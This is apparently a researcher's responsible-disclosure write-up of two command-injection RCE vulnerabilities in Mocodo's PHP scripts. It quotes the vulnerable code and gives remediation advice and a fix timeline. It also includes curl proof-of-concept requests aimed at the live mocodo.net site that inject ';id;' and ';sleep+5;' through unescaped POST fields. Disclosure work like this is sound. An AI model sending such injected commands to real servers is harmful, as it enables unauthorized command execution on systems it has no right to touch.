Exploring Mocodo Vulnerabilities: A Compilation of CVEs from 2024
Introduction
In the world of software development, security is a major concern that must constantly be addressed to protect both data and infrastructure. This article aims to reveal in detail two critical Remote Command Execution (RCE) vulnerabilities discovered in Mocodo, a popular tool used for database design. These flaws, if exploited, could allow an attacker to take control of the server hosting the application. We will discuss the nature of these vulnerabilities, their potential implications, and the measures to take to secure Mocodo installations.
What is Mocodo?
Figure 0x1 – Mocodo
Mocodo is an online tool designed to help developers and database designers visualize and generate relational database schemas from a simple text description. Thanks to its ease of use and its ability to generate clear and understandable schemas, Mocodo has become a popular choice for teaching and professional projects. However, like any software, Mocodo is not exempt from security flaws, some of which can have severe consequences.
Fun Fact: I discovered Mocodo at Oteria Cyber School, a cybersecurity school where I am pursuing my studies. We used this tool to learn how to create Conceptual Data Models (MCD) in database courses during the 2022-2023 academic year. This practical experience not only enriched our theoretical understanding but also highlighted the importance of security in handling and managing database schemas.
Vulnerability Discovery
The vulnerabilities in question were identified in PHP scripts that handle certain user inputs via web forms. These scripts do not properly filter user inputs, allowing the injection and execution of arbitrary commands on the server where Mocodo is installed.
Technical Details of RCE Vulnerability in /web/generate.php (CVE-2024-35374)
Vulnerable Code Segment in /web/generate.php
if ($_POST['conversions']) {
$transformation_options = "";
$conversions = array();
foreach ($_POST['conversions'] as $ext) {
if ($ext == "_ddl.sql") {
$transformation_options .= " " . $_POST['sql_case'] . ":labels";
};
if ($_POST['with_constraints']) {
$option = $transformations[str_replace("_mld", "_mld_with_constraints", $ext)];
} else {
$option = $transformations[$ext];
};
$transformation_options .= " " . $option;
$conversions[] = $ext;
};
$mocodo .= " -t{$transformation_options}";
$basthon_options .= " --select all -t{$transformation_options}";
};
...
$command_line = "{$mocodo} 2>&1 >/dev/null";
exec($command_line, $out);
Explanation
- Conversion processing: The code iterates over the
$_POST['conversions']array to process different file types specified by the user. - Command injection: If the
_ddl.sqlextension is found, the value of$_POST['sql_case']is directly added to the transformation options, which can include arbitrary commands ifsql_caseis maliciously crafted by an attacker.
Exploitation Example
Use this curl command to simulate an attack exploiting this vulnerability:
curl -X POST https://mocodo.net/web/generate.php \
-d "state=dirty&text=RCE:+rce&conversions[]=_ddl.sql&sql_case=;id;"
Figure 0x2 – PoC
Technical Details of RCE Vulnerability in /web/rewrite.php (CVE-2024-35373)
Vulnerable Code Segment in /web/rewrite.php
if (strpos($_SERVER['HTTP_REFERER'], 'localhost')) {
$mocodo = "~/opt/anaconda3/bin/mocodo";
} else {
$mocodo = "~/.local/bin/mocodo";
};
$command_line = "{$mocodo} -t " . $_POST['args'] . " 2>&1";
// Execute the command and test the exit code.
// If it is not 0, return an array with a key "err" and the error message.
$out = array();
exec($command_line, $out, $exitCode);
if ($exitCode) {
echo json_encode(array("err" => implode("\n", $out)));
exit();
}
Explanation
- Executable path selection: The path to the
mocodoexecutable is determined based on the request origin. This changes depending on whether the request comes fromlocalhostor not. - Command construction: The path is then used to construct a command line by adding
$_POST['args'], a user variable that is not filtered or escaped, allowing command injection. - Command execution: The command is executed with
exec(), and the output is processed. If an error occurs (indicated by a non-zeroexitCode), an error message is returned.
Exploitation Example
The vulnerability can be exploited by sending a POST request with a malicious payload in args. Here is how an attacker could use curl to inject a simple command (sleep 5), which would pause the server for 5 seconds:
curl -X POST https://mocodo.net/web/rewrite.php \
-d "state=dirty&text=RCE:+rce&args=;sleep+5;"
Figure 0x3 – PoC
Solutions and Recommendations
Suggested Remediation Measures
To fix this vulnerability, it is crucial to implement strict validation of user inputs and/or escape all executed commands:
- Use
escapeshellarg()for each parameter passed to the system command to ensure that no potentially dangerous character is interpreted as part of the command. - Input validation to ensure that transmitted data matches expected and secure values before using them in a system command context.
These measures will help prevent unauthorized command execution on the server and strengthen the overall security of the application.
Specific Remediation Steps
- Command escaping: Use
escapeshellarg()on$_POST['sql_case']and$_POST['args']to ensure all inputs are secured.
Timeline of Events
- May 9, 2024: Detection of Remote Command Execution (RCE) vulnerabilities in Mocodo.
- May 9, 2024: Notification of vulnerabilities to the Mocodo team via their official communication channel.
- May 9, 2024: Response from the Mocodo team, acknowledging receipt of the vulnerability report a few hours after notification.
- May 9, 2024: Vulnerability fixed in version 4.2.7
- May 9, 2024: Article publication
Useful Resources
For those interested in learning more about Mocodo or contributing to improving its security, here are useful links:
- Mocodo Online - The online platform where Mocodo is accessible for creating database schemas.
- GitHub - Mocodo - The GitHub repository of Mocodo, developed by Aristide Grange, where the source code is available and community contributions are welcome.
Acknowledgments
I sincerely thank the Mocodo team, and particularly the developer Aristide Grange, for their quick response and recognition of the importance of these security issues.